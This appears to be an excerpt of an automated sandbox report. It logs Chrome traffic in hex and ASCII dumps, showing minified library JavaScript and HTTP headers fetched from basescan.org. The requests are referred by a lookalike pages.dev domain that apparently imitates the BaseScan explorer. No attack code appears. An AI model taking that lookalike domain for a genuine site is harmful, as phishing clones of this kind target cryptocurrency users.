                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: 69 6e 74 38 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 6c 61 73 74 49 6e 64 65 78 4f 66 2e 63 61 6c 6c 28 74 2c 72 2c 69 29 3a 76 28 74 2c 5b 72 5d 2c 69 2c 65 2c 6e 29 3b 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 76 61 6c 20 6d 75 73 74 20 62 65 20 73 74 72 69 6e 67 2c 20 6e 75 6d 62 65 72 20 6f 72 20 42 75 66 66 65 72 22 29 7d 66 75 6e 63 74 69 6f 6e 20 76 28 74 2c 72 2c 69 2c 65 2c 6e 29 7b 76 61 72 20 6f 2c 75 3d 31 2c 73 3d 74 2e 6c 65 6e 67 74 68 2c 68 3d 72 2e 6c 65 6e 67 74 68 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 65 26 26 28 22 75 63 73 32 22 3d 3d 3d 28 65 3d 53 74 72 69 6e 67 28 65 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 7c 7c 22 75 63 73 2d 32 22 3d 3d 3d 65 7c 7c 22 75 74 66 31 36 6c 65 22 3d 3d 3d 65 7c 7c
                                                                                                                                                                                                                                              Data Ascii: int8Array.prototype.lastIndexOf.call(t,r,i):v(t,[r],i,e,n);throw new TypeError("val must be string, number or Buffer")}function v(t,r,i,e,n){var o,u=1,s=t.length,h=r.length;if(void 0!==e&&("ucs2"===(e=String(e).toLowerCase())||"ucs-2"===e||"utf16le"===e||
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: 35 37 33 34 33 3c 68 29 26 26 28 66 3d 68 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 34 3a 6f 3d 74 5b 6e 2b 31 5d 2c 75 3d 74 5b 6e 2b 32 5d 2c 73 3d 74 5b 6e 2b 33 5d 2c 31 32 38 3d 3d 28 31 39 32 26 6f 29 26 26 31 32 38 3d 3d 28 31 39 32 26 75 29 26 26 31 32 38 3d 3d 28 31 39 32 26 73 29 26 26 36 35 35 33 35 3c 28 68 3d 28 31 35 26 61 29 3c 3c 31 38 7c 28 36 33 26 6f 29 3c 3c 31 32 7c 28 36 33 26 75 29 3c 3c 36 7c 36 33 26 73 29 26 26 68 3c 31 31 31 34 31 31 32 26 26 28 66 3d 68 29 7d 6e 75 6c 6c 3d 3d 3d 66 3f 28 66 3d 36 35 35 33 33 2c 6c 3d 31 29 3a 36 35 35 33 35 3c 66 26 26 28 66 2d 3d 36 35 35 33 36 2c 65 2e 70 75 73 68 28 66 3e 3e 3e 31 30 26 31 30 32 33 7c 35 35 32 39 36 29 2c 66 3d 35 36 33 32 30 7c 31 30 32 33 26 66 29 2c 65 2e 70 75 73 68 28 66
                                                                                                                                                                                                                                              Data Ascii: 57343<h)&&(f=h);break;case 4:o=t[n+1],u=t[n+2],s=t[n+3],128==(192&o)&&128==(192&u)&&128==(192&s)&&65535<(h=(15&a)<<18|(63&o)<<12|(63&u)<<6|63&s)&&h<1114112&&(f=h)}null===f?(f=65533,l=1):65535<f&&(f-=65536,e.push(f>>>10&1023|55296),f=56320|1023&f),e.push(f
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: 72 72 61 79 2c 6c 2e 61 6c 6c 6f 63 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 69 29 7b 72 65 74 75 72 6e 20 6e 3d 72 2c 6f 3d 69 2c 73 28 65 3d 74 29 2c 65 3c 3d 30 3f 75 28 65 29 3a 76 6f 69 64 20 30 21 3d 3d 6e 3f 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 6f 3f 75 28 65 29 2e 66 69 6c 6c 28 6e 2c 6f 29 3a 75 28 65 29 2e 66 69 6c 6c 28 6e 29 3a 75 28 65 29 3b 76 61 72 20 65 2c 6e 2c 6f 7d 2c 6c 2e 61 6c 6c 6f 63 55 6e 73 61 66 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 68 28 74 29 7d 2c 6c 2e 61 6c 6c 6f 63 55 6e 73 61 66 65 53 6c 6f 77 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 68 28 74 29 7d 2c 6c 2e 69 73 42 75 66 66 65 72 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 74 26
                                                                                                                                                                                                                                              Data Ascii: rray,l.alloc=function(t,r,i){return n=r,o=i,s(e=t),e<=0?u(e):void 0!==n?"string"==typeof o?u(e).fill(n,o):u(e).fill(n):u(e);var e,n,o},l.allocUnsafe=function(t){return h(t)},l.allocUnsafeSlow=function(t){return h(t)},l.isBuffer=function(t){return null!=t&
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: 79 70 65 2e 73 77 61 70 31 36 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 6c 65 6e 67 74 68 3b 69 66 28 74 25 32 21 3d 30 29 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 42 75 66 66 65 72 20 73 69 7a 65 20 6d 75 73 74 20 62 65 20 61 20 6d 75 6c 74 69 70 6c 65 20 6f 66 20 31 36 2d 62 69 74 73 22 29 3b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 74 3b 72 2b 3d 32 29 6d 28 74 68 69 73 2c 72 2c 72 2b 31 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 2c 6c 2e 70 72 6f 74 6f 74 79 70 65 2e 73 77 61 70 33 32 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 6c 65 6e 67 74 68 3b 69 66 28 74 25 34 21 3d 30 29 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 42 75 66 66 65 72 20 73 69 7a 65
                                                                                                                                                                                                                                              Data Ascii: ype.swap16=function(){var t=this.length;if(t%2!=0)throw new RangeError("Buffer size must be a multiple of 16-bits");for(var r=0;r<t;r+=2)m(this,r,r+1);return this},l.prototype.swap32=function(){var t=this.length;if(t%4!=0)throw new RangeError("Buffer size
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: 74 7c 7c 30 3d 3d 3d 6c 2e 63 6f 6d 70 61 72 65 28 74 68 69 73 2c 74 29 7d 2c 6c 2e 70 72 6f 74 6f 74 79 70 65 2e 69 6e 73 70 65 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 22 22 2c 72 3d 55 2e 49 4e 53 50 45 43 54 5f 4d 41 58 5f 42 59 54 45 53 3b 72 65 74 75 72 6e 20 74 3d 74 68 69 73 2e 74 6f 53 74 72 69 6e 67 28 22 68 65 78 22 2c 30 2c 72 29 2e 72 65 70 6c 61 63 65 28 2f 28 2e 7b 32 7d 29 2f 67 2c 22 24 31 20 22 29 2e 74 72 69 6d 28 29 2c 74 68 69 73 2e 6c 65 6e 67 74 68 3e 72 26 26 28 74 2b 3d 22 20 2e 2e 2e 20 22 29 2c 22 3c 42 75 66 66 65 72 20 22 2b 74 2b 22 3e 22 7d 2c 6c 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6f 6d 70 61 72 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 69 2c 65 2c 6e 29 7b 69 66 28 52 28 74 2c 55 69 6e 74 38 41 72 72
                                                                                                                                                                                                                                              Data Ascii: t||0===l.compare(this,t)},l.prototype.inspect=function(){var t="",r=U.INSPECT_MAX_BYTES;return t=this.toString("hex",0,r).replace(/(.{2})/g,"$1 ").trim(),this.length>r&&(t+=" ... "),"<Buffer "+t+">"},l.prototype.compare=function(t,r,i,e,n){if(R(t,Uint8Arr


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              135192.168.2.549886104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC606OUTGET /assets/js/custom/web3-eth.min.js?v=24.4.4.9 HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC818INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:09 GMT
                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Last-Modified: Tue, 01 Aug 2023 03:48:38 GMT
                                                                                                                                                                                                                                              ETag: W/"0afe6d2bc4d91:0"
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 58865
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kCY9hyWnQ8LXrYeDteFh6REt6GuSUux%2BBzTaZgNeaQ%2BeifgEUgEbInNjAcuRvphRSI7tkwFoxxyz%2BRHsnEkJMvkW0%2B7K3OhCm6rKyPS3Hwe%2BjUFILy2gxUUTWuNiSQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2edabc41811-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC551INData Raw: 37 63 36 66 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 29 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 29 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3b 65 6c 73 65 7b 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c
                                                                                                                                                                                                                                              Data Ascii: 7c6f!function(e){if("object"==typeof exports&&"undefined"!=typeof module)module.exports=e();else if("function"==typeof define&&define.amd)define([],e);else{("undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?sel
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 61 5b 74 5d 5b 30 5d 2e 63 61 6c 6c 28 69 2e 65 78 70 6f 72 74 73 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 63 28 61 5b 74 5d 5b 31 5d 5b 65 5d 7c 7c 65 29 7d 2c 69 2c 69 2e 65 78 70 6f 72 74 73 2c 6f 2c 61 2c 73 2c 75 29 7d 72 65 74 75 72 6e 20 73 5b 74 5d 2e 65 78 70 6f 72 74 73 7d 66 6f 72 28 76 61 72 20 66 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 26 26 72 65 71 75 69 72 65 2c 65 3d 30 3b 65 3c 75 2e 6c 65 6e 67 74 68 3b 65 2b 2b 29 63 28 75 5b 65 5d 29 3b 72 65 74 75 72 6e 20 63 7d 28 7b 31 3a 5b 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 65 78 70 6f 72 74 73 3d 65 28 22 2e 2f 72 65 67 69 73 74 65 72 22
                                                                                                                                                                                                                                              Data Ascii: ={exports:{}};a[t][0].call(i.exports,function(e){return c(a[t][1][e]||e)},i,i.exports,o,a,s,u)}return s[t].exports}for(var f="function"==typeof require&&require,e=0;e<u.length;e++)c(u[e]);return c}({1:[function(e,t,r){"use strict";t.exports=e("./register"
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: 61 70 69 22 3a 35 2c 22 2e 2f 61 73 6e 31 2f 62 61 73 65 22 3a 37 2c 22 2e 2f 61 73 6e 31 2f 63 6f 6e 73 74 61 6e 74 73 22 3a 31 31 2c 22 2e 2f 61 73 6e 31 2f 64 65 63 6f 64 65 72 73 22 3a 31 33 2c 22 2e 2f 61 73 6e 31 2f 65 6e 63 6f 64 65 72 73 22 3a 31 36 2c 22 62 6e 2e 6a 73 22 3a 22 42 4e 22 7d 5d 2c 35 3a 5b 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 6e 3d 65 28 22 2e 2e 2f 61 73 6e 31 22 29 2c 69 3d 65 28 22 69 6e 68 65 72 69 74 73 22 29 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 74 29 7b 74 68 69 73 2e 6e 61 6d 65 3d 65 2c 74 68 69 73 2e 62 6f 64 79 3d 74 2c 74 68 69 73 2e 64 65 63 6f 64 65 72 73 3d 7b 7d 2c 74 68 69 73 2e 65 6e 63 6f 64 65 72 73 3d 7b 7d 7d 72 2e 64 65 66 69 6e 65 3d 66 75 6e
                                                                                                                                                                                                                                              Data Ascii: api":5,"./asn1/base":7,"./asn1/constants":11,"./asn1/decoders":13,"./asn1/encoders":16,"bn.js":"BN"}],5:[function(e,t,r){"use strict";var n=e("../asn1"),i=e("inherits");function o(e,t){this.name=e,this.body=t,this.decoders={},this.encoders={}}r.define=fun
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: 75 66 66 65 72 3b 66 75 6e 63 74 69 6f 6e 20 73 28 65 2c 74 29 7b 6f 2e 63 61 6c 6c 28 74 68 69 73 2c 74 29 2c 61 2e 69 73 42 75 66 66 65 72 28 65 29 3f 28 74 68 69 73 2e 62 61 73 65 3d 65 2c 74 68 69 73 2e 6f 66 66 73 65 74 3d 30 2c 74 68 69 73 2e 6c 65 6e 67 74 68 3d 65 2e 6c 65 6e 67 74 68 29 3a 74 68 69 73 2e 65 72 72 6f 72 28 22 49 6e 70 75 74 20 6e 6f 74 20 42 75 66 66 65 72 22 29 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 2c 74 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 29 74 68 69 73 2e 6c 65 6e 67 74 68 3d 30 2c 74 68 69 73 2e 76 61 6c 75 65 3d 65 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 75 7c 7c 28 65 3d 6e 65 77 20 75 28 65 2c 74 29 29 2c 74 68 69 73 2e 6c 65
                                                                                                                                                                                                                                              Data Ascii: uffer;function s(e,t){o.call(this,t),a.isBuffer(e)?(this.base=e,this.offset=0,this.length=e.length):this.error("Input not Buffer")}function u(e,t){if(Array.isArray(e))this.length=0,this.value=e.map(function(e){return e instanceof u||(e=new u(e,t)),this.le
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: 2e 6f 66 66 73 65 74 2c 74 68 69 73 2e 6c 65 6e 67 74 68 29 7d 2c 28 72 2e 45 6e 63 6f 64 65 72 42 75 66 66 65 72 3d 75 29 2e 70 72 6f 74 6f 74 79 70 65 2e 6a 6f 69 6e 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 6e 65 77 20 61 28 74 68 69 73 2e 6c 65 6e 67 74 68 29 29 2c 72 7c 7c 28 72 3d 30 29 2c 30 3d 3d 3d 74 68 69 73 2e 6c 65 6e 67 74 68 7c 7c 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 74 68 69 73 2e 76 61 6c 75 65 29 3f 74 68 69 73 2e 76 61 6c 75 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 6a 6f 69 6e 28 74 2c 72 29 2c 72 2b 3d 65 2e 6c 65 6e 67 74 68 7d 29 3a 28 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 74 68 69 73 2e 76 61 6c 75 65 3f 74 5b 72 5d 3d 74 68 69 73 2e 76 61
                                                                                                                                                                                                                                              Data Ascii: .offset,this.length)},(r.EncoderBuffer=u).prototype.join=function(t,r){return t||(t=new a(this.length)),r||(r=0),0===this.length||(Array.isArray(this.value)?this.value.forEach(function(e){e.join(t,r),r+=e.length}):("number"==typeof this.value?t[r]=this.va
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: 3b 28 74 68 69 73 2e 5f 62 61 73 65 53 74 61 74 65 3d 72 29 2e 65 6e 63 3d 65 2c 72 2e 70 61 72 65 6e 74 3d 74 7c 7c 6e 75 6c 6c 2c 72 2e 63 68 69 6c 64 72 65 6e 3d 6e 75 6c 6c 2c 72 2e 74 61 67 3d 6e 75 6c 6c 2c 72 2e 61 72 67 73 3d 6e 75 6c 6c 2c 72 2e 72 65 76 65 72 73 65 41 72 67 73 3d 6e 75 6c 6c 2c 72 2e 63 68 6f 69 63 65 3d 6e 75 6c 6c 2c 72 2e 6f 70 74 69 6f 6e 61 6c 3d 21 31 2c 72 2e 61 6e 79 3d 21 31 2c 72 2e 6f 62 6a 3d 21 31 2c 72 2e 75 73 65 3d 6e 75 6c 6c 2c 72 2e 75 73 65 44 65 63 6f 64 65 72 3d 6e 75 6c 6c 2c 72 2e 6b 65 79 3d 6e 75 6c 6c 2c 72 2e 64 65 66 61 75 6c 74 3d 6e 75 6c 6c 2c 72 2e 65 78 70 6c 69 63 69 74 3d 6e 75 6c 6c 2c 72 2e 69 6d 70 6c 69 63 69 74 3d 6e 75 6c 6c 2c 72 2e 63 6f 6e 74 61 69 6e 73 3d 6e 75 6c 6c 2c 72 2e 70 61
                                                                                                                                                                                                                                              Data Ascii: ;(this._baseState=r).enc=e,r.parent=t||null,r.children=null,r.tag=null,r.args=null,r.reverseArgs=null,r.choice=null,r.optional=!1,r.any=!1,r.obj=!1,r.use=null,r.useDecoder=null,r.key=null,r.default=null,r.explicit=null,r.implicit=null,r.contains=null,r.pa
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: 72 65 76 65 72 73 65 41 72 67 73 3d 65 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 72 29 7b 69 66 28 22 6f 62 6a 65 63 74 22 21 3d 3d 66 28 72 29 7c 7c 72 2e 63 6f 6e 73 74 72 75 63 74 6f 72 21 3d 3d 4f 62 6a 65 63 74 29 72 65 74 75 72 6e 20 72 3b 76 61 72 20 6e 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 6b 65 79 73 28 72 29 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 3d 3d 28 30 7c 65 29 26 26 28 65 7c 3d 30 29 3b 76 61 72 20 74 3d 72 5b 65 5d 3b 6e 5b 74 5d 3d 65 7d 29 2c 6e 7d 29 29 7d 2c 5b 22 5f 70 65 65 6b 54 61 67 22 2c 22 5f 64 65 63 6f 64 65 54 61 67 22 2c 22 5f 75 73 65 22 2c 22 5f 64 65 63 6f 64 65 53 74 72 22 2c 22 5f 64 65 63 6f 64 65 4f 62 6a 69 64 22 2c 22 5f 64 65 63 6f 64 65 54 69 6d 65 22 2c 22 5f 64 65 63
                                                                                                                                                                                                                                              Data Ascii: reverseArgs=e.map(function(r){if("object"!==f(r)||r.constructor!==Object)return r;var n={};return Object.keys(r).forEach(function(e){e==(0|e)&&(e|=0);var t=r[e];n[t]=e}),n}))},["_peekTag","_decodeTag","_use","_decodeStr","_decodeObjid","_decodeTime","_dec
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: 74 79 70 65 2e 6b 65 79 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 5f 62 61 73 65 53 74 61 74 65 3b 72 65 74 75 72 6e 20 69 28 6e 75 6c 6c 3d 3d 3d 74 2e 6b 65 79 29 2c 74 2e 6b 65 79 3d 65 2c 74 68 69 73 7d 2c 73 2e 70 72 6f 74 6f 74 79 70 65 2e 61 6e 79 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 62 61 73 65 53 74 61 74 65 2e 61 6e 79 3d 21 30 2c 74 68 69 73 7d 2c 73 2e 70 72 6f 74 6f 74 79 70 65 2e 63 68 6f 69 63 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 5f 62 61 73 65 53 74 61 74 65 3b 72 65 74 75 72 6e 20 69 28 6e 75 6c 6c 3d 3d 3d 65 2e 63 68 6f 69 63 65 29 2c 65 2e 63 68 6f 69 63 65 3d 74 2c 74 68 69 73 2e 5f 75 73 65 41 72 67 73 28 4f 62 6a 65 63 74 2e 6b
                                                                                                                                                                                                                                              Data Ascii: type.key=function(e){var t=this._baseState;return i(null===t.key),t.key=e,this},s.prototype.any=function(){return this._baseState.any=!0,this},s.prototype.choice=function(t){var e=this._baseState;return i(null===e.choice),e.choice=t,this._useArgs(Object.k
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: 73 2e 5f 64 65 63 6f 64 65 47 65 6e 65 72 69 63 28 65 2e 74 61 67 2c 74 2c 72 29 3a 74 68 69 73 2e 5f 64 65 63 6f 64 65 43 68 6f 69 63 65 28 74 2c 72 29 2c 74 2e 69 73 45 72 72 6f 72 28 69 29 29 72 65 74 75 72 6e 20 69 3b 69 66 28 65 2e 61 6e 79 7c 7c 6e 75 6c 6c 21 3d 3d 65 2e 63 68 6f 69 63 65 7c 7c 6e 75 6c 6c 3d 3d 3d 65 2e 63 68 69 6c 64 72 65 6e 7c 7c 65 2e 63 68 69 6c 64 72 65 6e 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 5f 64 65 63 6f 64 65 28 74 2c 72 29 7d 29 2c 65 2e 63 6f 6e 74 61 69 6e 73 26 26 28 22 6f 63 74 73 74 72 22 3d 3d 3d 65 2e 74 61 67 7c 7c 22 62 69 74 73 74 72 22 3d 3d 3d 65 2e 74 61 67 29 29 7b 76 61 72 20 6c 3d 6e 65 77 20 64 28 69 29 3b 69 3d 74 68 69 73 2e 5f 67 65 74 55 73 65 28 65 2e 63 6f 6e 74 61
                                                                                                                                                                                                                                              Data Ascii: s._decodeGeneric(e.tag,t,r):this._decodeChoice(t,r),t.isError(i))return i;if(e.any||null!==e.choice||null===e.children||e.children.forEach(function(e){e._decode(t,r)}),e.contains&&("octstr"===e.tag||"bitstr"===e.tag)){var l=new d(i);i=this._getUse(e.conta
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: 68 6f 69 63 65 3d 66 75 6e 63 74 69 6f 6e 28 69 2c 6f 29 7b 76 61 72 20 61 3d 74 68 69 73 2e 5f 62 61 73 65 53 74 61 74 65 2c 73 3d 6e 75 6c 6c 2c 75 3d 21 31 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 6b 65 79 73 28 61 2e 63 68 6f 69 63 65 29 2e 73 6f 6d 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 69 2e 73 61 76 65 28 29 2c 72 3d 61 2e 63 68 6f 69 63 65 5b 65 5d 3b 74 72 79 7b 76 61 72 20 6e 3d 72 2e 5f 64 65 63 6f 64 65 28 69 2c 6f 29 3b 69 66 28 69 2e 69 73 45 72 72 6f 72 28 6e 29 29 72 65 74 75 72 6e 21 31 3b 73 3d 7b 74 79 70 65 3a 65 2c 76 61 6c 75 65 3a 6e 7d 2c 75 3d 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 20 69 2e 72 65 73 74 6f 72 65 28 74 29 2c 21 31 7d 72 65 74 75 72 6e 21 30 7d 2c 74 68 69 73 29 2c 75 3f 73 3a
                                                                                                                                                                                                                                              Data Ascii: hoice=function(i,o){var a=this._baseState,s=null,u=!1;return Object.keys(a.choice).some(function(e){var t=i.save(),r=a.choice[e];try{var n=r._decode(i,o);if(i.isError(n))return!1;s={type:e,value:n},u=!0}catch(e){return i.restore(t),!1}return!0},this),u?s:


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              136192.168.2.549887104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC611OUTGET /assets/highcharts/js/v6/highcharts.js?v=24.4.4.9 HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC861INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:09 GMT
                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Cf-Bgj: minify
                                                                                                                                                                                                                                              Cf-Polished: origSize=209352
                                                                                                                                                                                                                                              ETag: "07653e4b33bd91:0"
                                                                                                                                                                                                                                              Last-Modified: Wed, 08 Feb 2023 11:53:00 GMT
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 58865
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=koAn9HxrnA%2BdMMr%2FXUKMlyzr%2Fhc3NOSbHdj2sZDKT5WPOpWqqPJtjMiwPiLARaefspe3rdbdNBE1zHFhJpPQT3nTlJSXzu9SB2dOdcyFecQa%2BJjiBhaffs4db2crXw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
